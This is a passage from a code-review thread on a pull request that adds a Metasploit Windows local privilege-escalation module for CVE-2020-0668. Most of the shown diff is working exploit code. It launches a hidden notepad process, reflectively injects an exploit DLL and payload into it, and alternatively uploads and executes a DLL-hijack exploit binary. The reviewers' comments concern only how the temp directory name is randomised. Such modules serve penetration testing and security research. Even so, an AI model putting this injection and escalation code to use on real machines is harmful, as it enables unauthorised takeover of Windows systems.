modules/exploits/windows/local/cve_2020_0668_service_tracing.rb

```diff
@@ -0,0 +1,388 @@
+
+  def setup_process
+    begin
+      print_status('Launching notepad to host the exploit...')
+      notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
+      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Meterpreter::RequestError
+      # Sandboxes could not allow to create a new process
+      # stdapi_sys_process_execute: Operation failed: Access is denied.
+      print_error('Operation failed. Trying to elevate the current process...')
+      process = client.sys.process.open
+    end
+    process
+  end
+
+  def inject_magic(process)
+    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x64.dll')
+    library_path = ::File.expand_path(library_path)
+
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    dll = ''
+    ::File.open(library_path, 'rb') { |f| dll = f.read }
+
+    exploit_mem, offset = inject_dll_data_into_process(process, dll)
+
+    print_status("Exploit injected. Injecting payload into #{process.pid}...")
+    payload_mem = inject_into_process(process, payload.encoded)
+
+    # invoke the exploit, passing in the address of the payload that
+    # we want invoked on successful exploitation.
+    print_status('Payload injected. Executing exploit...')
+    process.thread.create(exploit_mem + offset, payload_mem)
+  end
+
+  def launch_dll_trigger
+    begin
+      print_status('Checking target...')
+      validate_active_host
+      validate_target
+      print_status('Target Looks Good... trying to start notepad')
+      process = setup_process
+      inject_magic(process)
+      print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      print_error(e.message)
+    end
+  end
+
+  def launch_exe_trigger(upload_filename)
+    # Upload Exploit
+    vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{upload_filename}")
+#    exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe')
+    exploit_bin = exploit_data('netman_dll_hijack', 'netman_dll_hijack.exe')
+    write_file(upload_filename, exploit_bin)
+    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{upload_filename}")
+    begin
+      cmd_exec('cmd.exe', "/c #{upload_filename}", 60)
+    rescue Rex::TimeoutError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      print_error("Caught timeout.  Exploit may be taking longer or it may have failed.")
+    end
+    vprint_status("Cleaning up #{upload_filename}")
+    ensure_clean_destination(upload_filename)
+
+  end
+  def exploit
+    # Make directories
+    if datastore['EXPLOIT_DIR'].nil?
+      @exploit_dir = session.sys.config.getenv('TEMP') + "\\" + Rex::Text.rand_text_alpha((rand(8) + 6))
```

Comment:
```suggestion
      @exploit_dir = session.sys.config.getenv('TEMP') + "\\" + Rex::Text.rand_text_alpha(8..14)
```

Reply:
not that it makes much difference but wouldn't the equivalent be `6..14` ?

Reply:
> 
> 
> not that it makes much difference but wouldn't the equivalent be `6..14` ?

Yeah you're right. I misread.

Yet another reason why `int..int` format is vastly superior.

Reply:
Fixed